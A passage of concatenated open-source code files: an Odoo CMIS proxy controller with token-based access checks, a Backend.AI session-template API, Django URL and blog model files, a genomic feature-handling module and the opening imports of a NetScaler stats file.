response = werkzeug.Response(
json.dumps(value), mimetype='application/json',
headers=headers)
return response
@classmethod
def _get_redirect_url(cls, proxy_info, url_path):
cmis_location = proxy_info['location']
return urlparse.urljoin(cmis_location, url_path)
def _forward_get_file(self, url, proxy_info, params):
"""Method called to retrieved the content associated to a CMIS object.
The content is streamed between the CMIS container and the caller to
avoid to suck the server memory
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
r = requests.get(
url, params=params,
stream=True,
auth=(proxy_info['username'], proxy_info['password']))
r.raise_for_status()
headers = dict(r.headers.items())
self._sanitize_headers(headers)
return werkzeug.Response(
r, headers=headers,
direct_passthrough=True)
def _forward_get(self, url_path, proxy_info, model_inst, params):
"""
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
url = self._get_redirect_url(proxy_info, url_path)
if params.get('cmisselector') == 'content':
return self._forward_get_file(url, proxy_info, params)
r = requests.get(
url, params=params,
auth=(proxy_info['username'], proxy_info['password']))
r.raise_for_status()
if r.text:
return self._prepare_json_response(
r.json(), dict(r.headers.items()), proxy_info, model_inst)
else:
response = werkzeug.Response()
return response
def _forward_post(self, url_path, proxy_info, model_inst, params):
"""The CMIS Browser binding is designed to be queried from the browser
Therefore, the parameters in a POST are expected to be submitted as
HTTP multipart forms. Therefore each parameter in the request is
forwarded as a part of a multipart/form-data.
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
files = {}
if 'content' in params:
# we are in a mulitpart form data'
content = params.pop('content')
files['content'] = (
content.filename,
content.stream,
content.mimetype
)
for k, v in params.items():
# no filename for parts dedicated to HTTP Form data
files[k] = (None, v, 'text/plain;charset=utf-8')
url = self._get_redirect_url(proxy_info, url_path)
r = requests.post(url, files=files,
auth=(
proxy_info['username'], proxy_info['password']))
r.raise_for_status()
if r.text:
return self._prepare_json_response(
r.json(), dict(r.headers.items()), proxy_info, model_inst)
else:
response = werkzeug.Response()
return response
def _check_provided_token(self, cmis_path, proxy_info, params):
""" Check that a token is present in the request or in the http
headers and both are equal.
:return: the token value if checks are OK, False otherwise.
"""
token = request.httprequest.headers.get('Authorization')
if token:
token = token.replace('Bearer', '').strip()
else:
token = (params.get('token') or '').strip()
if 'token' in params:
params.pop('token')
if not token:
_logger.info("Tokens not provided in headers or request params")
return False
return token
def _decode_token(self, cmis_path, proxy_info, params,
token):
"""Return the Odoo object referenced by the token and the field name
for which the query is done
:return: a tuple (Odoo model instance if exists and user has at least
read access or False, field_name)
"""
token = json.loads(token)
model_name = token.get('model')
false_result = False, False
res_id = token.get('res_id')
if model_name not in request.env:
_logger.info("Invalid model name in token (%s)", model_name)
return false_result
model = request.env[model_name]
if not model.check_access_rights('read', raise_exception=False):
_logger.info("User has no read access on model %s", model_name)
return false_result
model_inst = model.browse(res_id)
if not model_inst.exists():
_logger.info("The referenced model doesn't exist or the user has "
"no read access (%s, %s)", model, res_id)
return false_result
return model_inst, token.get('field_name')
def _check_cmis_content_access(self, cmis_path, proxy_info, params,
model_inst, field_name):
"""Check that the CMIS content referenced into the request is the
same as or a child of the one linked to the odoo model instance.
:return: True if check is Ok False otherwise
"""
token_cmis_objectid = getattr(model_inst, field_name)
if not token_cmis_objectid:
_logger.info("The referenced model doesn't reference a CMIS "
"content (%s, %s)", model_inst._name, model_inst.id)
return False
request_cmis_objectid = params.get('renderedObjectId')
if request_cmis_objectid:
# If the proxy is called to render a cmis content, we need to check
# the original objectId since the one provided by the rendition
# service has no paths
params.pop('renderedObjectId')
else:
request_cmis_objectid = params.get('objectId')
repo = proxy_info['cmis_repository']
if not request_cmis_objectid:
# get the CMIS object id from cmis_path
cmis_content = repo.getObjectByPath(cmis_path)
request_cmis_objectid = cmis_content.getObjectId()
if request_cmis_objectid == token_cmis_objectid:
# the operation is on the CMIS content linked to the Odoo model
# instance
return True
cmis_object = repo.getObject(request_cmis_objectid)
# We can't use a CMIS query to check if a node is in the expected
# tree since the indexation is asynchronous. In place of a simple
# query we check if one of the paths of the node linked to the Odoo
# content instance is in one of the node paths of the requested
# cmis_object
child_paths = cmis_object.getPaths()
parent_paths = repo.getObject(token_cmis_objectid).getPaths()
for p in parent_paths:
for cp in child_paths:
if p in cp:
return True
_logger.info("%s is not a child of %s", request_cmis_objectid,
token_cmis_objectid)
return False
def _check_content_action_access(self, cmis_path, proxy_info, params,
model_inst):
"""Check that the User has de required Permissioon on the Odoo model
instance to di the expected CMIS action
"""
cmisaction = params.get('cmisaction')
if not cmisaction:
return True
operation = CMSI_ACTIONS_OPERATION_MAP.get(cmisaction)
if not operation:
_logger.info("CMIS action %s not supported", cmisaction)
return False
if not self._check_access_operation(model_inst, operation):
_logger.info("User don't have the access right for operation %s "
"on %s to execute the CMIS action %s", operation,
model_inst.name_get()[0][1], cmisaction)
return False
return True
def _check_access(self, cmis_path, proxy_info, params):
"""This method check that the user can access to the requested CMIS
content.
Security checks applied when the proxy mode is activated,:
1. Requests from the client must provide a token (in the header or
as param of the request).
If no security token is provided in this case, the access is denied.
2. The Odoo object referenced by the token (the token is build as
'model.name' + '_' + 'instance_id') must exist.
3. The user must have read access to the object referenced by the token
4. If a cmis_path or object_id is provided by the request, the
referenced CMIS content must be child of or the node referenced by
the Odoo object from the token (or equal)
5. If a cmisaction is provided by the request, a check is done to
ensure that the user has the required privileges in Odoo
"""
# check token conformity
token = self._check_provided_token(cmis_path, proxy_info, params)
if not token:
raise AccessError(_("Bad request"))
# check access to object from token
model_inst, field_name = self._decode_token(
cmis_path, proxy_info, params, token)
if not model_inst:
raise AccessError(_("Bad request"))
# check if the CMIS object in the request is the the one referenced on
# model_inst or a child of this one
if not cmis_path and 'objectId' not in params:
# The request is not for an identified content
return model_inst
if not self._check_cmis_content_access(
cmis_path, proxy_info, params, model_inst, field_name):
raise AccessError(_("Bad request"))
if not self._check_content_action_access(
cmis_path, proxy_info, params, model_inst):
raise AccessError(_("Bad request"))
return model_inst
@http.route([
CMIS_PROXY_PATH + '/<int:backend_id>',
CMIS_PROXY_PATH + '/<int:backend_id>/<path:cmis_path>'
], type='http', auth="user", csrf=False, methods=['GET', 'POST'])
@main.serialize_exception
def call_cmis_services(self, backend_id, cmis_path="", **kwargs):
"""Call at the root of the CMIS repository. These calls are for
requesting the global services provided by the CMIS Container
"""
# proxy_info are informations available into the cache without loading
# the cmis.backend from the database
proxy_info = request.env['cmis.backend'].get_proxy_info_by_id(
backend_id)
method = request.httprequest.method
model_inst = False
if proxy_info.get('apply_odoo_security'):
model_inst = self._check_access(cmis_path, proxy_info, kwargs)
if method not in ['GET', 'POST']:
raise AccessError(
_("The HTTP METHOD %s is not supported by CMIS") % method)
if method == 'GET':
method = self._forward_get
elif method == 'POST':
method = self._forward_post
return method(cmis_path, proxy_info, model_inst, kwargs)
| agpl-3.0 | 6,017,278,269,581,853,000 | 39.267241 | 79 | 0.596286 | false |
lablup/backend.ai-manager | src/ai/backend/manager/api/session_template.py | 1 | 14992 | import json
import logging
from typing import (
Any,
List,
Mapping,
TYPE_CHECKING,
Tuple,
)
import uuid
from aiohttp import web
import aiohttp_cors
import sqlalchemy as sa
import trafaret as t
import yaml
from ai.backend.common import validators as tx
from ai.backend.common.logging import BraceStyleAdapter
from ..models import (
association_groups_users as agus, domains,
groups, session_templates, keypairs, users, UserRole,
query_accessible_session_templates, TemplateType,
)
from ..models.session_template import check_task_template
from .auth import auth_required
from .exceptions import InvalidAPIParameters, TaskTemplateNotFound
from .manager import READ_ALLOWED, server_status_required
from .types import CORSOptions, Iterable, WebMiddleware
from .utils import check_api_params, get_access_key_scopes
if TYPE_CHECKING:
from .context import RootContext
log = BraceStyleAdapter(logging.getLogger(__name__))
@server_status_required(READ_ALLOWED)
@auth_required
@check_api_params(t.Dict(
{
tx.AliasedKey(['group', 'groupName', 'group_name'], default='default'): t.String,
tx.AliasedKey(['domain', 'domainName', 'domain_name'], default='default'): t.String,
t.Key('owner_access_key', default=None): t.Null | t.String,
t.Key('payload'): t.String
}
))
async def create(request: web.Request, params: Any) -> web.Response:
if params['domain'] is None:
params['domain'] = request['user']['domain_name']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
requester_uuid = request['user']['uuid']
log.info(
'SESSION_TEMPLATE.CREATE (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
user_uuid = request['user']['uuid']
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
if requester_access_key != owner_access_key:
# Admin or superadmin is creating sessions for another user.
# The check for admin privileges is already done in get_access_key_scope().
query = (
sa.select([keypairs.c.user, users.c.role, users.c.domain_name])
.select_from(sa.join(keypairs, users, keypairs.c.user == users.c.uuid))
.where(keypairs.c.access_key == owner_access_key)
)
result = await conn.execute(query)
row = result.first()
owner_domain = row['domain_name']
owner_uuid = row['user']
owner_role = row['role']
else:
# Normal case when the user is creating her/his own session.
owner_domain = request['user']['domain_name']
owner_uuid = requester_uuid
owner_role = UserRole.USER
query = (
sa.select([domains.c.name])
.select_from(domains)
.where(
(domains.c.name == owner_domain) &
(domains.c.is_active)
)
)
qresult = await conn.execute(query)
domain_name = qresult.scalar()
if domain_name is None:
raise InvalidAPIParameters('Invalid domain')
if owner_role == UserRole.SUPERADMIN:
# superadmin can spawn container in any designated domain/group.
query = (
sa.select([groups.c.id])
.select_from(groups)
.where(
(groups.c.domain_name == params['domain']) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
elif owner_role == UserRole.ADMIN:
# domain-admin can spawn container in any group in the same domain.
if params['domain'] != owner_domain:
raise InvalidAPIParameters("You can only set the domain to the owner's domain.")
query = (
sa.select([groups.c.id])
.select_from(groups)
.where(
(groups.c.domain_name == owner_domain) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
else:
# normal users can spawn containers in their group and domain.
if params['domain'] != owner_domain:
raise InvalidAPIParameters("You can only set the domain to your domain.")
query = (
sa.select([agus.c.group_id])
.select_from(agus.join(groups, agus.c.group_id == groups.c.id))
.where(
(agus.c.user_id == owner_uuid) &
(groups.c.domain_name == owner_domain) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
if group_id is None:
raise InvalidAPIParameters('Invalid group')
log.debug('Params: {0}', params)
try:
body = json.loads(params['payload'])
except json.JSONDecodeError:
try:
body = yaml.safe_load(params['payload'])
except (yaml.YAMLError, yaml.MarkedYAMLError):
raise InvalidAPIParameters('Malformed payload')
template_data = check_task_template(body)
template_id = uuid.uuid4().hex
resp = {
'id': template_id,
'user': user_uuid.hex,
}
query = session_templates.insert().values({
'id': template_id,
'domain_name': params['domain'],
'group_id': group_id,
'user_uuid': user_uuid,
'name': template_data['metadata']['name'],
'template': template_data,
'type': TemplateType.TASK,
})
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response(resp)
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('all', default=False): t.ToBool,
tx.AliasedKey(['group_id', 'groupId'], default=None): tx.UUID | t.String | t.Null,
}),
)
async def list_template(request: web.Request, params: Any) -> web.Response:
resp = []
access_key = request['keypair']['access_key']
domain_name = request['user']['domain_name']
user_role = request['user']['role']
user_uuid = request['user']['uuid']
log.info('SESSION_TEMPLATE.LIST (ak:{})', access_key)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
entries: List[Mapping[str, Any]]
if request['is_superadmin'] and params['all']:
j = (
session_templates
.join(users, session_templates.c.user_uuid == users.c.uuid, isouter=True)
.join(groups, session_templates.c.group_id == groups.c.id, isouter=True)
)
query = (
sa.select([session_templates, users.c.email, groups.c.name], use_labels=True)
.select_from(j)
.where(
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.execute(query)
entries = []
for row in result:
is_owner = True if row.session_templates_user == user_uuid else False
entries.append({
'name': row.session_templates_name,
'id': row.session_templates_id,
'created_at': row.session_templates_created_at,
'is_owner': is_owner,
'user': (str(row.session_templates_user_uuid)
if row.session_templates_user_uuid else None),
'group': (str(row.session_templates_group_id)
if row.session_templates_group_id else None),
'user_email': row.users_email,
'group_name': row.groups_name,
})
else:
extra_conds = None
if params['group_id'] is not None:
extra_conds = ((session_templates.c.group_id == params['group_id']))
entries = await query_accessible_session_templates(
conn,
user_uuid,
TemplateType.TASK,
user_role=user_role,
domain_name=domain_name,
allowed_types=['user', 'group'],
extra_conds=extra_conds,
)
for entry in entries:
resp.append({
'name': entry['name'],
'id': entry['id'].hex,
'created_at': str(entry['created_at']),
'is_owner': entry['is_owner'],
'user': str(entry['user']),
'group': str(entry['group']),
'user_email': entry['user_email'],
'group_name': entry['group_name'],
'type': 'user' if entry['user'] is not None else 'group',
})
return web.json_response(resp)
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('format', default='yaml'): t.Null | t.Enum('yaml', 'json'),
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def get(request: web.Request, params: Any) -> web.Response:
if params['format'] not in ['yaml', 'json']:
raise InvalidAPIParameters('format should be "yaml" or "json"')
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.GET (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
template_id = request.match_info['template_id']
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.template])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
template = await conn.scalar(query)
if not template:
raise TaskTemplateNotFound
template = json.loads(template)
if params['format'] == 'yaml':
body = yaml.dump(template)
return web.Response(text=body, content_type='text/yaml')
else:
return web.json_response(template)
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('payload'): t.String,
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def put(request: web.Request, params: Any) -> web.Response:
template_id = request.match_info['template_id']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.PUT (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.id])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.scalar(query)
if not result:
raise TaskTemplateNotFound
try:
body = json.loads(params['payload'])
except json.JSONDecodeError:
body = yaml.safe_load(params['payload'])
except (yaml.YAMLError, yaml.MarkedYAMLError):
raise InvalidAPIParameters('Malformed payload')
template_data = check_task_template(body)
query = (
sa.update(session_templates)
.values(template=template_data, name=template_data['metadata']['name'])
.where((session_templates.c.id == template_id))
)
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response({'success': True})
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def delete(request: web.Request, params: Any) -> web.Response:
template_id = request.match_info['template_id']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.DELETE (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*'
)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.id])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.scalar(query)
if not result:
raise TaskTemplateNotFound
query = (
sa.update(session_templates)
.values(is_active=False)
.where((session_templates.c.id == template_id))
)
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response({'success': True})
async def init(app: web.Application) -> None:
pass
async def shutdown(app: web.Application) -> None:
pass
def create_app(default_cors_options: CORSOptions) -> Tuple[web.Application, Iterable[WebMiddleware]]:
app = web.Application()
app.on_startup.append(init)
app.on_shutdown.append(shutdown)
app['api_versions'] = (4, 5)
app['prefix'] = 'template/session'
cors = aiohttp_cors.setup(app, defaults=default_cors_options)
cors.add(app.router.add_route('POST', '', create))
cors.add(app.router.add_route('GET', '', list_template))
template_resource = cors.add(app.router.add_resource(r'/{template_id}'))
cors.add(template_resource.add_route('GET', get))
cors.add(template_resource.add_route('PUT', put))
cors.add(template_resource.add_route('DELETE', delete))
return app, []
| lgpl-3.0 | -2,623,418,009,516,440,000 | 36.668342 | 101 | 0.566169 | false |
rachidoulasri/django_projectwebpage | v0/urls.py | 1 | 1118 | """v0 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
#from api.views import ApiDocumentView
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
url(r'^', include('authentification.urls')),
url(r'^authentification/', include('authentification.urls')),
url(r'^admin/', include(admin.site.urls)),
]
urlpatterns += staticfiles_urlpatterns()
| mit | -5,645,816,495,818,676,000 | 36.266667 | 79 | 0.726297 | false |
domain51/d51.django.apps.blogs | d51/django/apps/blogs/models.py | 1 | 1309 | from django.db import models
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
class RichTextField(models.TextField):
pass
class Post(models.Model):
internal_title = models.CharField(max_length=255)
display_title = models.CharField(null=True, blank=True, max_length=255)
summary = RichTextField()
content = RichTextField()
meta_keywords = models.CharField(null=True, blank=True, max_length=255)
slug = models.SlugField(unique=True)
author = models.ForeignKey(User, blank=True, null=True)
published = models.DateTimeField()
add_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now=True)
link = models.CharField(blank=True, null=True, max_length=200)
@property
def title(self):
return self.display_title or self.internal_title
def get_absolute_url(self):
return reverse('post-detail', kwargs={
'year':self.published.year,
'month':self.published.strftime('%b'),
'day':self.published.day,
'slug':self.slug,
})
def __unicode__(self):
return self.title
class Meta:
ordering = ['-published',]
verbose_name = 'blog post'
verbose_name_plural = 'blog posts'
| gpl-3.0 | -3,552,080,607,034,685,400 | 29.44186 | 75 | 0.663866 | false |
fls-bioinformatics-core/RnaChipIntegrator | rnachipintegrator/Features.py | 1 | 19026 | #!/bin/env python
#
# Features.py: classes for handling feature data
# Copyright (C) University of Manchester 2011-2019 Peter Briggs, Leo Zeef
# & Ian Donaldson
#
"""
Features.py
Classes for handling feature data.
"""
import logging
import io
from .distances import closestDistanceToRegion
from .utils import make_errline
class FeatureSet(object):
"""Class for storing a set of features
RNA-seq features consists of genes/transcripts/isomers, which
are stored individually in Feature objects. This class is a
container for a collection of Feature objects and provides
methods to operate on the collection, by creating subsets by
filtering, and sorting the features based on various criteria.
"""
def __init__(self,features_file=None,features_list=None):
"""Create a new FeatureSet instance
Raises an exception if there are errors in the input file data
(non-numeric fields for start/end positions, end positions
occurring before start positions, or illegal strand values).
Arguments:
features_file (str): (optional) the name of an input
file to read the feature data from
features_list (list): (optional) list of Feature objects
to populate the FeatureSet with
"""
self.features = []
self.source_file = None
if features_file:
self.loadFeaturesFromFile(features_file)
elif features_list:
for feature in features_list:
self.addFeature(feature)
def loadFeaturesFromFile(self,features_file):
"""Read features from a file and populate the object
Arguments:
features_file: the name of the input file to read features from.
"""
# Local flags etc
line_index = 0
critical_error = False
# Read in data from file
with io.open(features_file,'rt') as fp:
for line in fp:
# Increment index
line_index += 1
# Skip lines starting with #
if line.startswith('#'):
logging.debug("Feature file: skipped line: %s" %
line.strip())
continue
# Lines are tab-delimited and have at least 5 columns:
# ID chr start end strand
items = line.strip().split('\t')
if len(items) < 5:
logging.warning("Feature file: skipped line: %s" %
line.strip())
logging.warning("Insufficient number of fields (%d)" %
len(items))
continue
# Check line is valid i.e. start and stop should be
# numbers, strand should be + or -
problem_fields = []
if not items[2].isdigit():
problem_fields.append(2)
if not items[3].isdigit():
problem_fields.append(3)
if not (items[4] == '+' or items[4] == '-'):
problem_fields.append(4)
if problem_fields:
# If this is the first line then assume it's a header
# and ignore
if line_index == 1:
logging.warning("%s: first line ignored as header: "
"%s" % (features_file,line.strip()))
else:
# Indicate problem field(s)
logging.error("%s: critical error line %d: bad "
"values:" % (features_file,line_index))
logging.error("%s" % line.strip())
logging.error("%s" % make_errline(line.strip(),
problem_fields))
# This is a critical error: update flag
critical_error = True
# Continue to next line
continue
elif int(items[2]) >= int(items[3]):
# Start position is same or higher than end
logging.error("%s: critical error line %d: 'end' comes "
"before 'start':" % (features_file,
line_index))
logging.error("%s" % line.strip())
logging.error("%s" % make_errline(line.strip(),(2,3)))
# This is a critical error: update flag but continue
# reading
critical_error = True
continue
# Store in a new Feature object
feature = Feature(items[0],
items[1],
items[2],
items[3],
items[4],
source_file=features_file)
# Additional flag
if len(items) >= 6:
# Is column 6 a flag?
try:
flag_value = int(items[5])
if flag_value != 0 and flag_value != 1:
flag_value = None
except ValueError:
flag_value = None
# Store value
feature.flag = flag_value
# Store data
self.features.append(feature)
# Deal with postponed critical errors
if critical_error:
raise Exception("Critical error(s) in '%s'" % features_file)
# Store the source file
self.source_file = features_file
# Return a reference to this object
return self
def addFeature(self,feature):
"""Append a feature to the FeatureSet object
Arguments:
feature: a Feature instance.
"""
self.features.append(feature)
def filterByChr(self,matchChr):
"""Return a subset of features filtered by specified chromosome name
Returns a new FeatureSet object containing only the data from
the current object which matches the specified criteria.
"""
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.chrom == matchChr:
feature_subset.addFeature(feature)
return feature_subset
def filterByStrand(self,matchStrand):
"""Return a subset of features filtered by specified strand
Returns a new FeatureSet object containing only the data from
the current object which matches the specified criteria.
"""
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.strand == matchStrand:
feature_subset.addFeature(feature)
return feature_subset
def filterByFlag(self,matchFlag):
"""Return a subset of features filtered by flag value
Returns a new FeatureSet object containing only the features from
the current object which matches the specified criteria.
Note that if there is no flag (the "isFlagged()" function returns
False) then an empty set will be returned.
"""
# Make a new (empty) RNASeqData object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.flag == matchFlag:
feature_subset.addFeature(feature)
return feature_subset
def filterByTSS(self,limit1,limit2,exclude_limits=False):
"""Return a subset of features filtered by TSS position
Returns a new FeatureSet object containing only the features
from the current object where the TSS positions fall within a
region defined by upper and lower limits.
limits can be supplied in either order (i.e. highest/lowest
or lowest/highest).
If exclude_limits is False (the default) then TSS positions
that fall exactly on one of the boundaries are counted as
being within the region; if it is True then these TSS
positions will not be considered to lie inside the region.
"""
# Sort out upper and lower limits
if limit1 > limit2:
upper,lower = limit1,limit2
else:
upper,lower = limit2,limit1
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
TSS = feature.getTSS()
if exclude_limits:
if lower < TSS and TSS < upper:
feature_subset.addFeature(feature)
else:
if lower <= TSS and TSS <= upper:
feature_subset.addFeature(feature)
return feature_subset
def sortByDistanceFrom(self,position):
"""Sort the features into order based on distance from a position
Sorts the features into order of absolute distance of
their TSS to the specified position (closest first).
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
abs(record.getTSS()-position))
return self
def sortByClosestEdgeTo(self,position1,position2=None):
"""Sort the features into order based on closest edge (TSS or TES)
Sorts the features into order of smallest absolute distance
to the specified position (closest first), considering both TSS
and TES, using the getClosestEdgeDistanceTo method of the
Feature class.
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
record.getClosestEdgeDistanceTo(position1,
position2))
return self
def sortByClosestTSSTo(self,position1,position2=None):
"""Sort the features into order based on closest edge to TSS
Sorts the features into order of smallest absolute distance
to the specified position (closest first) to the TSS position,
using the getClosestTSSDistanceTo method of the Feature class.
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
record.getClosestTSSDistanceTo(position1,
position2))
return self
def isFlagged(self):
"""Check whether feature data includes flags
Checks whether all the Feature records also have a valid flag
associated with them - if yes then returns True (indicating the
dataset as a whole is flagged), otherwise returns False.
"""
# Check all data and look for any None flags
for feature in self.features:
if feature.flag is None:
return False
# All flags valid
return True
def __iter__(self):
return iter(self.features)
def __getitem__(self,key):
try:
start = key.start
stop = key.stop
step = key.step
slice_ = FeatureSet()
for feature in self.features[start:stop:step]:
slice_.addFeature(feature)
return slice_
except AttributeError:
return self.features[key]
def __len__(self):
return len(self.features)
def __eq__(self,other):
if len(self) != len(other):
return False
for f1,f2 in zip(self,other):
if f1 != f2:
return False
return True
def __ne__(self,other):
if len(self) != len(other):
return True
for f1,f2 in zip(self,other):
if f1 != f2:
return True
return False
class Feature(object):
"""Class for storing an 'feature' (gene/transcript/isomer)
Access the data for the feature using the object's properties:
id
chrom
start
end
strand
tss
tes
A feature can also have the following optional data
associated with it:
- A source file name, which is set via the 'source_file'
keyword and accessed via the 'source_file' property.
It will be None if no filename has been specified.
There are also convenience methods (getTSS, getTES, getPromoterRegion)
and methods for calculating various distances.
"""
def __init__(self,feature_id,chrom,start,end,strand,source_file=None):
self.id = feature_id
self.chrom = chrom
self.start = int(start)
self.end = int(end)
self.strand = strand
self.flag = None
self.source_file = source_file
# Set the TSS and TES
if self.strand == '+':
self.tss = self.start
self.tes = self.end
elif self.strand == '-':
self.tss = self.end
self.tes = self.start
else:
raise Exception("Bad strand: '%s'" % self.strand)
def __repr__(self):
items = [self.id,
self.chrom,
str(self.start),
str(self.end),
self.strand]
if self.flag != None:
items.append(str(self.flag))
return '\t'.join(items)
def __eq__(self,other):
return \
(self.id == other.id) and \
(self.strand == other.strand) and \
(self.start == other.start) and \
(self.end == other.end)
def __ne__(self,other):
return \
(self.id != other.id) or \
(self.strand != other.strand) or \
(self.start != other.start) or \
(self.end != other.end)
def getTSS(self):
"""Return the TSS coordinate
TTS (transcription start site) is the start position for a +ve
strand, or end for a -ve strand.
This is a wrapper for accessing the 'tss' property.
"""
return self.tss
def getTES(self):
"""Return the TES coordinate
TES (transcription end site) is the start position for a +ve
strand, or end for a -ve strand.
This is a wrapper for accessing the 'tes' property.
"""
return self.tes
def containsPosition(self,coordinate):
"""Check whether a coordinate is within the gene coordinates
Returns True if coordinate lies within start and end, False
otherwise.
"""
return (self.start <= coordinate and coordinate <= self.end)
def getClosestTSSDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return distance from TSS to a coordinate or region
For a single specified position, return the absolute distance
between the position and the TSS.
If a second position is given (specifying a region) then return
smallest absolute distance of (TSS,position1) and (TSS,position2).
By default there is no special treatment when the TSS lies inside
the region specified by two positions; to return zero distance in
these cases, set the 'zero_inside_region' argument to True.
"""
return closestDistanceToRegion(self.getTSS(),
position1,position2,
zero_inside_region)
def getClosestTESDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return distance from TES to a coordinate or region
For a single specified position, return the absolute distance
between the position and the TES.
If a second position is given (specifying a region) then return
smallest absolute distance of (TES,position1) and (TES,position2).
By default there is no special treatment when the TES lies inside
the region specified by two positions; to return zero distance in
these cases, set the 'zero_inside_region' argument to True.
"""
return closestDistanceToRegion(self.getTES(),
position1,position2,
zero_inside_region)
def getClosestEdgeDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return closest edge distance to a coordinate or region
For a single specified position, the closest edge is whichever
of the TSS or TES is nearest (smallest absolute distance) from
that position i.e. the smallest distance of (TSS,position) and
(TES,position).
If a second position is given (specifying a region) then
the closest edge is whichever of the TSS/TES is closest to
either position1 or position2 i.e. the smallest distance of
(TSS,position1), (TES,position1), (TSS,position2) and
(TES,position2).
By default there is no special treatment when either the TSS
or TES lie inside the region specified by two positions; to
set this to zero, set the 'zero_inside_region' argument to
True.
"""
return min(self.getClosestTSSDistanceTo(position1,
position2,
zero_inside_region),
self.getClosestTESDistanceTo(position1,
position2,
zero_inside_region))
def getPromoterRegion(self,to_TSS,from_TSS):
"""Return the coordinates of the promoter region
The promoter region is a region of coordinates around the
TSS of a gene, defined by the supplied distances 'to_TSS'
(the distance downstream from the TSS) and 'from_TSS' (the
distance upstream from the TSS).
Returns a tuple containing the start and end coordinates
defining the promoter region.
"""
if self.strand == '+':
return (self.getTSS() - to_TSS,
self.getTSS() + from_TSS)
else:
return (self.getTSS() + to_TSS,
self.getTSS() - from_TSS)
| artistic-2.0 | -4,439,065,279,214,473,700 | 36.087719 | 77 | 0.553716 | false |
mahabs/nitro | nssrc/com/citrix/netscaler/nitro/resource/stat/cmp/cmp_stats.py | 1 | 23212 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
